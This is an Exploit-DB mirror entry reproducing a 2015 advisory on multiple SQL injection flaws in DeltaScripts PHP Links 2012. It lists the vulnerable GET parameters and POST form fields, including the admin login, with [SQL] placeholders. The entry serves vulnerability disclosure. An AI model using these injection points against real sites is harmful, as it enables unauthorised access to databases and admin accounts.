exploit-db-mirror/platforms/php/webapps/37786.txt
Offensive Security 9c07c0f3e0 DB: 2015-08-17
17 new exploits
2015-08-17 05:01:49 +00:00

35 lines
1 KiB
Text
Executable file

source: http://www.securityfocus.com/bid/55478/info
DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.
http://www.example.com/phplinks/index.php?catid=[SQL]
http://www.example.com/phplinks/review.php?id=[SQL]
http://www.example.com/phplinks/search.php?search=[SQL]
http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
http://www.example.com/phplinks/vote.php
In POST method :
id=[SQL]&rating=
http://www.example.com/phplinks/admin/adm_login.php
In POST method :
admin_password=test&admin_username=[SQL]&submit=Login
http://www.example.com/phplinks/login.php
In POST method :
email=[SQL]&forgotten=&password=[SQL]&submit=Login